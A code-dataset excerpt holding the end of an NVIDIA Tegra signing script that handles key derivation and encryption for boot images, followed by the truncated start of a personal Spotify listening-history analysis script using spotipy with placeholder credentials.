internal = SignKey()\n if kdd == None:\n internal.key.aeskey = str_to_hex(kdk)\n else:\n internal.key.aeskey = str_to_hex(kdk+kdd)\n\n internal.keysize = len(internal.key.aeskey)\n msg = str_to_hex(msgStr)\n\n return do_hmac_sha256(msg, len(msg), internal)\n\ndef do_kdf_params_t234(dk, params, kdf_list):\n # Note some kdf is using string operation, some are hex operation\n is_hex = True\n is_str = False\n L = 256\n basic_params = params['BASIC']\n\n # Derive the key relationship: dk -> kdk -> *_dec_kdk\n dk_params = params['DK'][dk]\n dk_ctx = {\n 'KDK' : dk_params['KDK'],\n 'Label' : hex_to_str(kdf_list[KdfArg.DKSTR]), # Note this is passed in\n 'Context' : hex_to_str(kdf_list[KdfArg.DKVER]), # Note this is passed in\n }\n\n dk_ctx['Msg'] = get_composed_msg(dk_ctx['Label'], dk_ctx['Context'], L, is_hex)\n\n kdk_params = params['KDK'][dk_ctx['KDK']]\n kdk_to_use = kdk_params['KDK']\n kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : kdk_params[\"Label\"],\n }\n kdk_ctx['Msg'] = get_composed_msg(kdk_ctx['Label'], '', L, is_str)\n\n bl_dec_kdk_ctx = {}\n fw_dec_kdk_ctx = {}\n\n # Check if bl_dec_kdk is defined for this dk\n if '_ROM_DEC_KDK' not in kdk_to_use:\n bl_dec_kdk_params = params['DEC_KDK'][kdk_ctx['KDK']]\n kdk_to_use = bl_dec_kdk_params['KDK']\n bl_dec_kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : hex_to_str(kdf_list[KdfArg.BLSTR]), # Note this is passed in\n }\n\n bl_dec_kdk_ctx['Msg'] = get_composed_msg(bl_dec_kdk_ctx['Label'], '', L, is_hex)\n\n # Check if fw_dec_kdk is defined for this dk\n if '_ROM_DEC_KDK' not in kdk_to_use:\n fw_dec_kdk_params = params['DEC_KDK'][bl_dec_kdk_ctx['KDK']]\n kdk_to_use = fw_dec_kdk_params['KDK']\n fw_dec_kdk_ctx = {\n \"KDK\" : kdk_to_use,\n \"Label\" : hex_to_str(kdf_list[KdfArg.FWSTR]), # Note this is passed in\n }\n\n fw_dec_kdk_ctx['Msg'] = get_composed_msg(fw_dec_kdk_ctx['Label'], '', L, is_hex)\n else:\n fw_dec_kdk_ctx['Msg'] = None\n\n else:\n bl_dec_kdk_ctx['Msg'] = None\n fw_dec_kdk_ctx['Msg'] = None\n\n dec_kdk_params = params['DEC_KDK'][kdk_to_use]\n\n dec_kdk_ctx = {\n 'KDK' : basic_params[dec_kdk_params['KDK']],\n 'KDD' : basic_params[dec_kdk_params['KDD']],\n 'Label' : dec_kdk_params['Label'],\n }\n\n dec_kdk_ctx[\"Msg\"] = get_composed_msg(dec_kdk_ctx['Label'], '', L, is_str)\n\n # Pop the elements that are no longer needed\n while (len(kdf_list) > KdfArg.FLAG):\n kdf_list.pop()\n\n return ([dec_kdk_ctx['KDK'] + dec_kdk_ctx['KDD'], dec_kdk_ctx[\"Msg\"],\n bl_dec_kdk_ctx[\"Msg\"], kdk_ctx[\"Msg\"], dk_ctx[\"Msg\"]])\n\ndef do_kdf(params_slist, kdf_list):\n base_name = script_dir + 'v3_kdf_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.tag'\n raw_file = open_file(raw_name, 'wb')\n\n # to write to file\n # order: sizes then data for: deckdk_kdkkdd, deckdk_msg, (bl_deckdk_msg), kdk_msg, dk_msg, iv, aad, tag, src, result_name\n\n for param in params_slist:\n if param == None:\n arr = int_2bytes(4, 0)\n else:\n arr = int_2bytes(4, len(str_to_hex(param)))\n write_file(raw_file, arr)\n\n for kdf in kdf_list:\n arr = int_2bytes(4, len(kdf))\n write_file(raw_file, arr)\n\n arr = int_2bytes(4, len(result_name) + 1)\n write_file(raw_file, arr)\n\n for param in params_slist:\n if param != None:\n write_file(raw_file, str_to_hex(param))\n\n for kdf in kdf_list:\n write_file(raw_file, kdf)\n\n write_file(raw_file, result_name.encode(\"utf-8\"))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--kdf', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_dgst = result_fh.read()\n kdf_list[KdfArg.TAG] = buff_dgst[:]\n\n with open(raw_name, 'rb') as f:\n buff_data = bytearray(f.read())\n src_bytes = len(kdf_list[KdfArg.SRC])\n result_bytes = len(result_name) + 1\n payload_offset = len(buff_data) - src_bytes - result_bytes\n kdf_list[KdfArg.SRC] = buff_data[payload_offset:payload_offset+src_bytes]\n result_fh.close()\n os.remove(raw_name)\n os.remove(result_name)\n return True\n os.remove(raw_name)\n return False\n\ndef do_derive_dk(dk, params, kdf_list, p_key):\n dk_list = params['DK']\n\n if dk in dk_list:\n if p_key.kdf.chipid == '0x230':\n params_slist = do_kdf_params_t234(dk, params, kdf_list)\n else:\n from tegrasign_v3_nvkey_load import do_kdf_params\n return do_kdf_params(dk, params, kdf_list)\n\n return do_kdf(params_slist, kdf_list)\n raise tegrasign_exception('Can not derive %s' % (dk))\n\ndef do_kdf_params_oem(dk, params, kdf_list, p_key):\n # Note some kdf is using string operation, some are hex operation\n is_hex = True\n is_str = False\n L = 256\n basic_params = params['BASIC']\n\n dk_params = params['DK'][dk]\n dk_ctx = {\n \"KDK\" : dk_params['KDK'],\n 'Label' : p_key.kdf.label.get_strbuf(),\n 'Context' : p_key.kdf.context.get_strbuf(),\n }\n\n dk_ctx[\"Msg\"] = get_composed_msg(dk_ctx['Label'], dk_ctx['Context'], L, is_hex)\n\n kdk_params = params['KDK'][dk_ctx['KDK']]\n kdk_to_use = kdk_params['KDK']\n kdk_upstream = kdk_to_use\n kdk_ctx = {\n \"KDK\" : kdk_to_use,\n \"Label\" : kdk_params[\"Label\"],\n }\n\n kdk_ctx['Msg'] = get_composed_msg(kdk_ctx['Label'], '', L, is_str)\n bl_kdk_ctx = {}\n fw_kdk_ctx = {}\n gp_kdk_ctx = {}\n gpto_kdk_ctx = {}\n tz_kdk_ctx = {}\n bl_kdk_ctx['Msg'] = None\n fw_kdk_ctx['Msg'] = None\n gp_kdk_ctx['Msg'] = None\n gpto_kdk_ctx['Msg'] = None\n tz_kdk_ctx['Msg'] = None\n count = 5\n while kdk_to_use in ['SBK_NVMB_KDK', 'SBK_TZ_KDK', 'SBK_GP_KDK', 'SBK_GP_TOSB_KDK', 'SBK_FW_KDK'] and (count>0):\n # Check if sbk_bl_kdk is defined for this dk\n if 'SBK_NVMB_KDK' in kdk_to_use:\n bl_kdk_params = params['KDK'][kdk_to_use]\n kdk_to_use = bl_kdk_params['KDK']\n\n if p_key.kdf.chipid == '0x230':\n bl_kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : p_key.kdf.bl_label.get_strbuf(),\n }\n bl_kdk_ctx['Msg'] = get_composed_msg(bl_kdk_ctx['Label'], '', L, is_hex)\n else:\n bl_kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : bl_kdk_params['Label'],\n 'Context' : p_key.kdf.bl_label.get_strbuf(),\n }\n bl_kdk_ctx['Msg'] = get_composed_msg(bl_kdk_ctx['Label'], bl_kdk_ctx['Context'], L, False)\n\n elif 'SBK_TZ_KDK' in kdk_to_use:\n tz_kdk_params = params['KDK'][kdk_to_use]\n kdk_to_use = tz_kdk_params['KDK']\n tz_kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : p_key.kdf.tz_label.get_strbuf()\n }\n\n tz_kdk_ctx['Msg'] = get_composed_msg(tz_kdk_ctx['Label'], '', L, is_hex)\n\n elif 'SBK_GP_KDK' in kdk_to_use:\n gp_kdk_params = params['KDK'][kdk_to_use]\n kdk_to_use = gp_kdk_params['KDK']\n gp_kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : p_key.kdf.gp_label.get_strbuf()\n }\n\n gp_kdk_ctx['Msg'] = get_composed_msg(gp_kdk_ctx['Label'], '', L, is_hex)\n\n elif 'SBK_GP_TOSB_KDK' in kdk_to_use:\n gpto_kdk_params = params['KDK'][kdk_to_use]\n kdk_to_use = gpto_kdk_params['KDK']\n gpto_kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : '544F5342', # 'TOSB'\n }\n\n gpto_kdk_ctx['Msg'] = get_composed_msg(gpto_kdk_ctx['Label'], '', L, is_hex)\n\n # Check if sbk_fw_kdk is defined for this dk\n elif 'SBK_FW_KDK' in kdk_to_use:\n fw_kdk_params = params['KDK'][kdk_to_use]\n kdk_to_use = fw_kdk_params['KDK']\n fw_kdk_ctx = {\n \"KDK\" : kdk_to_use,\n \"Label\" : p_key.kdf.fw_label.get_strbuf(),\n }\n\n fw_kdk_ctx['Msg'] = get_composed_msg(fw_kdk_ctx['Label'], '', L, is_hex)\n\n count = count - 1\n\n aes_params = params['AES'][kdk_to_use]\n aes_iv = manifest_xor_offset(basic_params[aes_params['IV']], aes_params[\"Offset\"])\n aes_aad = aes_params['Manifest'] + AAD_0_96\n aes_tag = bytes(16)\n\n dec_kdk_params = params['DEC_KDK'][aes_params['KDK']]\n\n dec_kdk_ctx = {\n 'KDK' : basic_params[dec_kdk_params['KDK']],\n 'KDD' : basic_params[dec_kdk_params['KDD']],\n \"Label\" : dec_kdk_params[\"Label\"],\n }\n\n dec_kdk_ctx[\"Msg\"] = get_composed_msg(dec_kdk_ctx['Label'], '', L, is_str)\n\n # Pop the elements that are no longer needed\n while (len(kdf_list) > KdfArg.DKSTR):\n kdf_list.pop()\n\n # Replace sbk key str if the sbk key file is found\n sbk_keystr = aes_params[\"Plain\"]\n if p_key.filename != None and os.path.exists(p_key.filename):\n with open(p_key.filename, 'rb') as f:\n key_buf = bytearray(f.read())\n if extract_AES_key(key_buf, p_key):\n sbk_keystr = hex_to_str(p_key.key.aeskey)\n\n return [dec_kdk_ctx['KDK'] + dec_kdk_ctx['KDD'], aes_iv, aes_aad, sbk_keystr, dec_kdk_ctx['Msg'],\n bl_kdk_ctx['Msg'], tz_kdk_ctx['Msg'], gp_kdk_ctx['Msg'], gpto_kdk_ctx['Msg'], kdk_ctx['Msg'], dk_ctx['Msg']]\n\ndef do_kdf_oem(params_slist, kdf_list, blockSize):\n if is_hsm():\n from tegrasign_v3_hsm import do_kdf_oem_hsm\n p_key = SignKey()\n p_key.hsm.type = KeyType.SBK\n p_key.kdf.flag = kdf_list[KdfArg.FLAG]\n p_key.kdf.iv.set_buf(kdf_list[KdfArg.IV])\n p_key.kdf.aad.set_buf(kdf_list[KdfArg.AAD])\n p_key.kdf.tag.set_buf(kdf_list[KdfArg.TAG])\n p_key.src_buf = kdf_list[KdfArg.SRC]\n p_key.block_size = int(blockSize)\n if do_kdf_oem_hsm(params_slist, p_key) == True:\n kdf_list[KdfArg.SRC] = p_key.src_buf\n kdf_list[KdfArg.TAG] = p_key.kdf.tag.get_hexbuf()\n return True\n return False\n\n base_name = script_dir + 'v3_aeskdf_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.tag'\n raw_file = open_file(raw_name, 'wb')\n\n # to write to file\n # order: sizes then data for: deckdk_kdkkdd, deckdk_iv, deckdk_aad, deckdk_plain, deckdk_msg, tzkdk_msg, gpkdk_msg,\n # gptokdk_msg, kdk_msg, dk_msg, iv, aad, tag, src, flag, result_name\n\n for param in params_slist:\n if param == None:\n arr = int_2bytes(4, 0)\n else:\n arr = int_2bytes(4, len(str_to_hex(param)))\n write_file(raw_file, arr)\n\n for kdf in kdf_list:\n arr = int_2bytes(4, len(kdf))\n write_file(raw_file, arr)\n\n arr = int_2bytes(4, len(result_name) + 1)\n write_file(raw_file, arr)\n\n for param in params_slist:\n if param != None:\n write_file(raw_file, str_to_hex(param))\n\n for kdf in kdf_list:\n if (type(kdf) == str) and (len(kdf) == 1): # handles flag that is a 1-char str\n arr = int_2bytes(1, ord(kdf))\n write_file(raw_file, arr)\n else:\n write_file(raw_file, kdf)\n\n write_file(raw_file, result_name.encode(\"utf-8\"))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--kdfoem', raw_name])\n if blockSize != \"0\":\n command.extend(['--block', str(blockSize)])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_dgst = result_fh.read()\n kdf_list[KdfArg.TAG] = buff_dgst[:]\n\n with open(raw_name, 'rb') as f:\n buff_data = bytearray(f.read())\n src_bytes = len(kdf_list[KdfArg.SRC])\n flg_bytes = len(kdf_list[KdfArg.FLAG])\n result_bytes = len(result_name) + 1\n payload_offset = len(buff_data) - src_bytes - result_bytes - flg_bytes\n kdf_list[KdfArg.SRC] = buff_data[payload_offset:payload_offset+src_bytes]\n result_fh.close()\n os.remove(result_name)\n os.remove(raw_name)\n return True\n os.remove(raw_name)\n return False\n\ndef do_derive_dk_oem(dk, params, kdf_list, p_key, blockSize):\n dk_list = params['DK']\n\n if dk in dk_list:\n params_slist = do_kdf_params_oem(dk, params, kdf_list, p_key)\n\n return do_kdf_oem(params_slist, kdf_list, blockSize)\n raise tegrasign_exception('Can not derive %s' % (dk))\n\ndef map_bin_to_dk_oem(p_key, params):\n if p_key.kdf.dk != None:\n return p_key.kdf.dk\n enc_file = p_key.src_file\n magicid = p_key.kdf.magicid\n basename = os.path.splitext(os.path.basename(enc_file))[0].lower()\n ext = os.path.splitext(os.path.basename(enc_file))[1].lower()\n\n if 'bpmp' in basename and 'ist' in basename:\n return 'SBK_BPMP_IST_DK'\n\n if ('bpmp' in basename) and ('.dtb' == ext):\n return 'SBK_BPMP_DTB_DK'\n\n if 'ape' in basename:\n return 'SBK_APE_DK'\n\n if 'applet' in basename:\n return 'SBK_BPMP_MB2_DK'\n\n if 'bpmp' in basename:\n return 'SBK_BPMP_FW_DK'\n\n if 'br_bct' in basename:\n return 'SBK_BCT_DK'\n\n if 'cpurf' in basename:\n return 'SBK_MB2_RF_DK'\n\n if 'dce' in basename:\n return 'SBK_DCE_DK'\n\n if 'eks' in basename:\n return 'SBK_EKS_DK'\n\n if 'fsi' in basename:\n return 'SBK_FSI_DK'\n\n if 'ist' in basename and 'config' in basename: # This is IST-CONFIG\n return 'SBK_IST_CONFIG_DK'\n\n if 'ist' in basename and 'ucode' in basename: # This is IST-UCODE (Key ON/OFF IST)\n return 'SBK_IST_UCODE_DK'\n\n if 'oist' in basename and 'ucode' in basename: # This is CCPLEX-IST-UCODE\n return 'SBK_CCPLEX_IST_DK'\n\n if 'mb1_bct' in basename or ('mb1' in basename and 'bct' in basename):\n return 'SBK_MB1BCT_DK'\n\n if 'mb1' in basename:\n return 'SBK_MB1_DK'\n\n if 'mb2_bct' in basename:\n return 'SBK_MB2BCT_DK'\n\n if 'mb2' in basename:\n return 'SBK_MB2_DK'\n\n if 'mce' in basename:\n return 'SBK_MCE_DK'\n\n if 'mem' in basename and ('.bct' == ext):\n if '0' in basename:\n return 'SBK_MEMBCT0_DK'\n elif '1' in basename:\n return 'SBK_MEMBCT1_DK'\n elif '2' in basename:\n return 'SBK_MEMBCT2_DK'\n elif '3' in basename:\n return 'SBK_MEMBCT3_DK'\n\n if 'nvdec' in basename:\n return 'SBK_NVDEC_DK'\n\n if 'psc_bl' in basename:\n return 'SBK_BL1_DK'\n\n if 'pscfw' in basename:\n return 'SBK_PSCFW_PKG_DK'\n\n if 'psc_rf' in basename:\n return 'SBK_PSC_RF_DK'\n\n if 'rce' in basename:\n return 'SBK_RCE_DK'\n\n if 'sc7' in basename:\n return 'SBK_SC7_RF_DK'\n\n if 'sce' in basename:\n return 'SBK_SCE_DK'\n\n if 'spe' in basename:\n return 'SBK_SPE_DK'\n\n if 'tz' in basename and 'vault' in basename:\n return 'SBK_TZ_VAULT_DK'\n\n if 'tos' in basename:\n return 'SBK_TOSB_DK'\n\n if 'tsec' in basename:\n return 'SBK_TSEC_DK'\n\n if 'uefi' and 'jetson' in basename:\n return 'SBK_CPU_BL_DK'\n\n if 'xusb'in basename:\n return 'SBK_XUSB_DK'\n\n if 'os' in basename or 'hv' in basename:\n return 'SBK_OS_DK'\n\n if magicid != None:\n # To find the DK for this magic id\n kdk_params = params.get('KDK')\n dk_params = params.get('DK')\n for kdk in kdk_params:\n kdk_val = kdk_params.get(kdk)\n if len(kdk_val) == 1:\n continue\n if kdk_val['Label'] == magicid:\n for dk in dk_params:\n if (kdk == dk_params.get(dk)['KDK']):\n return dk\n raise tegrasign_exception('Can not identify the key choice for %s' % (enc_file))\n\ndef load_params_oem(p_key):\n chipid = p_key.kdf.chipid\n if p_key.kdf.chipid == '0x230':\n import yaml\n cfg_file = 'tegrasign_v3_oemkey.yaml'\n if os.path.exists(cfg_file) == False:\n cfg_file = script_dir + 'tegrasign_v3_oemkey.yaml'\n with open(cfg_file) as f:\n params = yaml.safe_load(f)\n dk = map_bin_to_dk_oem(p_key, params['DER_OEM'][chipid])\n return dk, params['DER_OEM'][chipid]\n\n else:\n from tegrasign_v3_nvkey_load import load_params_oem_stage\n params = load_params_oem_stage(p_key)\n dk = map_bin_to_dk_oem(p_key, params)\n return dk, params\n\ndef do_derive_cbc(p_key):\n # Note some kdf is using string operation\n is_hex = False\n L = 128 # key length in bits\n\n p_key.kdf.get_composed_msg(L, is_hex, is_hex)\n\n current_dir_path = os.path.dirname(os.path.realpath(__file__)) + '/'\n base_name = current_dir_path + 'v3_kdfcbc_'\n raw_name = base_name + '.raw'\n raw_file = open_file(raw_name, 'wb')\n filename = p_key.src_file\n\n result_name = os.path.splitext(filename)[0] + '_encrypt' + os.path.splitext(filename)[1]\n\n # to write to file\n # order: sizes then data for: msg, iv, src, result_name\n kdf_list = [p_key.kdf.get_hexmsg(), p_key.key.aeskey, p_key.kdf.iv.get_hexbuf(), p_key.get_sign_buf()]\n\n for kdf in kdf_list:\n if kdf == None:\n arr = int_2bytes(4, 0)\n else:\n arr = int_2bytes(4, len(kdf))\n write_file(raw_file, arr)\n\n arr = int_2bytes(4, len(result_name) + 1)\n write_file(raw_file, arr)\n\n for kdf in kdf_list:\n if kdf != None:\n write_file(raw_file, kdf)\n\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n\n write_file(raw_file, result_name.encode(\"utf-8\"))\n write_file(raw_file, nullarr)\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--kdfcbc', raw_name])\n\n ret_str = run_command(command)\n os.remove(raw_name)\n\n if check_file(result_name):\n return True\n return False\n\ndef do_random(p_key):\n if is_hsm():\n from tegrasign_v3_hsm import do_random_hsm\n do_random_hsm(p_key)\n else:\n p_key.ran.buf = bytearray(p_key.ran.size * p_key.ran.count)\n for i in range(p_key.ran.count):\n buf = random_gen(p_key.ran.size)\n start = i * p_key.ran.size\n p_key.ran.buf[start:start+p_key.ran.size] = buf[:]\n info_print('Generated random strings: %s ' %(hex_to_str(p_key.ran.buf)))\n\n if p_key.filename != 'Unknown':\n with open(p_key.filename, \"wb\") as f:\n f.write(p_key.ran.buf)\n\ndef do_derive_hmacsha(p_key):\n if is_hsm():\n from tegrasign_v3_hsm import do_derive_hmacsha_hsm\n buff_hash = do_derive_hmacsha_hsm(p_key.get_sign_buf(), p_key)\n else:\n key = do_kdf_kdf2(hex_to_str(p_key.key.aeskey), None, p_key.kdf.label.get_strbuf(), p_key.kdf.context.get_strbuf(), True)\n backup = p_key\n backup.key.aeskey = key\n buff_hash = do_hmac_sha256(p_key.get_sign_buf(), p_key.len, backup)\n\n # save hash to *.hash file\n hash_file_name = os.path.splitext(p_key.src_file)[0] + '.hash'\n with open(hash_file_name, \"wb\") as f:\n f.write(buff_hash)\n\ndef do_derive_aesgcm(p_key, internal):\n if is_hsm():\n from tegrasign_v3_hsm import do_derive_aesgcm_hsm\n buff_enc = do_derive_aesgcm_hsm(p_key.get_sign_buf(), p_key)\n else:\n key = do_kdf_kdf2(hex_to_str(p_key.key.aeskey), None, p_key.kdf.label.get_strbuf(), p_key.kdf.context.get_strbuf(), True)\n backup = p_key\n backup.key.aeskey = key\n buff_enc = do_aes_gcm(p_key.get_sign_buf(), p_key.len, backup, internal[\"--iv\"], internal[\"--aad\"], internal[\"--tag\"],\n internal[\"--verify\"], internal[\"--verbose\"])\n\n with open(p_key.src_file, 'rb') as f:\n buff_data = bytearray(f.read())\n\n buff_data = buff_data[0:p_key.off] + buff_enc + buff_data[p_key.off + p_key.len:]\n\n enc_file_name = os.path.splitext(p_key.src_file)[0] + '_encrypt' + os.path.splitext(p_key.src_file)[1]\n with open(enc_file_name, 'wb') as f:\n f.write(buff_data)\n\n tag_file_name = os.path.splitext(p_key.src_file)[0] + '.tag'\n with open(tag_file_name, 'wb') as f:\n f.write(p_key.kdf.tag.get_hexbuf())\n\n'''\nPerform key operation and pad back values for tag & src if successful\n'''\ndef do_key_derivation(p_key, kdf_list, blockSize):\n try:\n info_print('Perform key derivation on ' + p_key.src_file)\n\n if (kdf_list[KdfArg.FLAG] <= DerKey.NVPDS):\n from tegrasign_v3_nvkey_load import load_params\n dk, params = load_params(p_key)\n return do_derive_dk(dk, params, kdf_list, p_key)\n else:\n dk, params = load_params_oem(p_key)\n return do_derive_dk_oem(dk, params, kdf_list, p_key, blockSize)\n\n except ImportError as e:\n raise tegrasign_exception('Please check setup. Could not find ' + str(e))\n\n except Exception as e:\n info_print(traceback.format_exc())\n raise tegrasign_exception(\"Unknown %s requested for key derivation encryption. Error %s\" %(p_key.src_file, str(e)))\n","repo_name":"zbwu/athena_l4t_sdk","sub_path":"bootloader/tegrasign_v3_internal.py","file_name":"tegrasign_v3_internal.py","file_ext":"py","file_size_in_byte":57971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"43027727346","text":"import time\r\n\r\nstart_time = time.time()\r\nimport os\r\nimport json\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pymysql\r\nimport sqlalchemy\r\nimport spotipy\r\nimport spotipy.util as util\r\nimport re\r\nfrom datetime import datetime\r\nimport pprint\r\n\r\nwith open(r'File_Location', encoding = 'utf8') as j:\r\n playlist_dict = json.loads(j.read())\r\nstreaming_0 = pd.read_json(r'File_Location')\r\nstreaming_1 = pd.read_json(r'File_Location')\r\nstreaming = pd.concat([streaming_0, streaming_1], axis = 0, join = \"outer\")\r\nstreaming[\"combinedArtistSong\"] = streaming[\"trackName\"] + \" - \" + streaming[\"artistName\"]\r\nstreaming = streaming.reset_index(drop=True)\r\n\r\n#Rearranging playlist dictionary\r\n\r\nplaylist_names = []\r\nfor playlist in range(len(playlist_dict['playlists'])):\r\n playlist_names.append(playlist_dict['playlists'][playlist]['name'])\r\nplaylist_names = pd.DataFrame(playlist_names)\r\n\r\nplaylist_songs = pd.DataFrame([])\r\nfor playlist in range(len(playlist_dict['playlists'])):\r\n try:\r\n track_list_i = playlist_dict['playlists'][playlist].get('items')\r\n track_list_i = pd.DataFrame(track_list_i)['track']\r\n track_list_i = pd.DataFrame(track_list_i.tolist())\r\n track_list_i[\"Playlist\"] = playlist_names.iloc[playlist]\r\n track_list_i[\"Playlist\"] = track_list_i[\"Playlist\"].fillna(method=\"ffill\")\r\n playlist_songs = pd.concat([playlist_songs, track_list_i], axis=0, join='outer')\r\n except:\r\n pass\r\n\r\nplaylist_songs = playlist_songs.drop(playlist_songs.columns[[5]], axis = 1)\r\nplaylist_songs = playlist_songs.dropna()\r\nplaylist_songs = playlist_songs.reset_index(drop=True)\r\n\r\n#Authentication\r\nclient_id = 'XXXXXXX'\r\nclient_secret = 'XXXXXXX'\r\nusername = \"griffin_sleigh\"\r\nscope = \"user-read-currently-playing user-read-recently-played\"\r\nredirect_uri = \"http://localhost:8888/callback/\"\r\n\r\ntoken = util.prompt_for_user_token(username, scope, client_id = client_id, client_secret = client_secret, redirect_uri = redirect_uri)\r\nsp = spotipy.Spotify(auth=token)\r\n\r\nuri_df = pd.DataFrame([])\r\nfor track in range(len(playlist_songs)):\r\n try:\r\n uri = playlist_songs.at[track, 'trackUri']\r\n track_info = pd.DataFrame(sp.audio_features(uri)[0], index = [track])\r\n track_info['track_image'] = sp.track(uri, market = 'AU')['album']['images'][0]['url']\r\n track_info['track_url'] = sp.track(uri, market = 'AU')['external_urls']['spotify']\r\n uri_df = pd.concat([uri_df, track_info], axis = 0)\r\n except:\r\n token = util.prompt_for_user_token(username, scope, client_id=client_id, client_secret=client_secret,redirect_uri=redirect_uri)\r\n sp = spotipy.Spotify(auth=token)\r\n uri = playlist_songs.at[track, 'trackUri']\r\n track_info = pd.DataFrame(sp.audio_features(uri)[0], index = [track])\r\n track_info['track_image'] = sp.track(uri, market = 'AU')['album']['images'][0]['url']\r\n track_info['track_url'] = sp.track(uri, market = 'AU')['external_urls']['spotify']\r\n uri_df = pd.concat([uri_df, track_info], axis = 0)\r\n\r\nplaylist_songs = pd.concat([playlist_songs, uri_df], axis = 1)\r\nplaylist_songs[\"combinedArtistSong\"] = playlist_songs[\"trackName\"] + \" - \" + playlist_songs[\"artistName\"]\r\nplaylist_songs['countPlayed'] = \"\"\r\n\r\n#Adding some elements to playlist_songs from streaming\r\nlast_date = datetime.strptime(max(streaming[\"endTime\"]), \"%Y-%m-%d %H:%M\")\r\n\r\nfor song in range(len(playlist_songs)):\r\n comb_artist_song = re.escape(playlist_songs.at[song, \"combinedArtistSong\"])\r\n playlist_songs.at[song, 'countPlayed'] = streaming['combinedArtistSong'].str.count(comb_artist_song).sum()\r\n first_played_row = streaming['combinedArtistSong'].str.contains(comb_artist_song).idxmax()\r\n first_played_date = datetime.strptime(streaming.at[first_played_row, \"endTime\"], \"%Y-%m-%d %H:%M\")\r\n playlist_songs.at[song, 'daysSinceFirstPlayed'] = (last_date - first_played_date).days\r\n\r\n#transpose playlist_songs for spider chart\r\nplaylist_songs_transposing = playlist_songs[[\"combinedArtistSong\", \"acousticness\", \"danceability\", \"energy\", \"liveness\", \"loudness\", \"speechiness\", \"valence\"]]\r\n\r\nstreaming_size = pd.DataFrame(streaming.groupby(\"combinedArtistSong\").size(), columns = [\"plays\"])\r\nstreaming_first_dates = pd.DataFrame(streaming.groupby(\"combinedArtistSong\").first())\r\nstreaming_first_dates[\"endTime\"] = streaming_first_dates[\"endTime\"].apply(lambda x:datetime.strptime(x,\"%Y-%m-%d %H:%M\"))\r\nstreaming_grouped = streaming_size.join(streaming_first_dates)\r\nstreaming_grouped[\"daysSinceFirstPlay\"] = (last_date - streaming_grouped['endTime']).astype('timedelta64[D]')\r\nstreaming_grouped[\"addedToEverything\"] = \"\"\r\nstreaming_grouped[\"combinedArtistSong\"] = streaming_grouped.index\r\nstreaming_grouped = streaming_grouped.reset_index(drop=True)\r\n\r\nstart_time = time.time()\r\ntoken = util.prompt_for_user_token(username, scope, client_id = client_id, client_secret = client_secret, redirect_uri = redirect_uri)\r\nsp = spotipy.Spotify(auth=token)\r\n\r\nuri_df = pd.DataFrame([])\r\nfor song in range(len(streaming_grouped)):\r\n try:\r\n track_info = pd.DataFrame([])\r\n comb_artist_song = streaming_grouped.at[song, \"combinedArtistSong\"]\r\n artist = streaming_grouped.at[song, \"artistName\"]\r\n track = streaming_grouped.at[song, \"trackName\"]\r\n if playlist_songs[\"combinedArtistSong\"].str.contains(re.escape(comb_artist_song)).any():\r\n streaming_grouped.at[song, \"addedToEverything\"] = 1\r\n else:\r\n streaming_grouped.at[song, \"addedToEverything\"] = 0\r\n searchResults = sp.search(q=\"artist:\" + artist + \" track:\" + track, type=\"track\", market=\"AU\")\r\n try:\r\n uri = searchResults['tracks']['items'][0].get('uri')\r\n track_info = pd.DataFrame(sp.audio_features(uri)[0], index=[song])\r\n track_info['track_image'] = sp.track(uri, market='AU')['album']['images'][0]['url']\r\n track_info['track_url'] = sp.track(uri, market='AU')['external_urls']['spotify']\r\n except:\r\n uri = \"NaN\"\r\n track_info = pd.DataFrame(sp.audio_features(uri)[0], index=[song])\r\n uri_df = pd.concat([uri_df, track_info], axis = 0)\r\n except:\r\n token = util.prompt_for_user_token(username, scope, client_id=client_id, client_secret=client_secret, redirect_uri=redirect_uri)\r\n sp = spotipy.Spotify(auth=token)\r\n track_info = pd.DataFrame([])\r\n comb_artist_song = streaming_grouped.at[song, \"combinedArtistSong\"]\r\n artist = streaming_grouped.at[song, \"artistName\"]\r\n track = streaming_grouped.at[song, \"trackName\"]\r\n if playlist_songs[\"combinedArtistSong\"].str.contains(re.escape(comb_artist_song)).any():\r\n streaming_grouped.at[song, \"addedToEverything\"] = 1\r\n else:\r\n streaming_grouped.at[song, \"addedToEverything\"] = 0\r\n searchResults = sp.search(q=\"artist:\" + artist + \" track:\" + track, type=\"track\", market=\"AU\")\r\n try:\r\n uri = searchResults['tracks']['items'][0].get('uri')\r\n track_info = pd.DataFrame(sp.audio_features(uri)[0], index=[song])\r\n track_info['track_image'] = sp.track(uri, market='AU')['album']['images'][0]['url']\r\n track_info['track_url'] = sp.track(uri, market='AU')['external_urls']['spotify']\r\n except:\r\n uri = \"NaN\"\r\n track_info = pd.DataFrame(sp.audio_features(uri)[0], index=[song])\r\n uri_df = pd.concat([uri_df, track_info], axis = 0)\r\n\r\nstreaming_grouped = pd.concat([streaming_grouped, uri_df], axis = 1)\r\nstreaming_grouped = streaming_grouped.dropna()\r\n\r\nuser_info = sp.user(username)\r\nusername = user_info['display_name']\r\nuser_url = user_info['external_urls']['spotify']\r\n\r\nmisc_info = {\"username\": username, \"user_url\": user_url}\r\nmisc_info = pd.DataFrame([misc_info])\r\n\r\n#TODO Power BI add current song playing\r\nimport spotipy\r\nimport spotipy.util as util\r\n\r\n#Authentication\r\nclient_id = 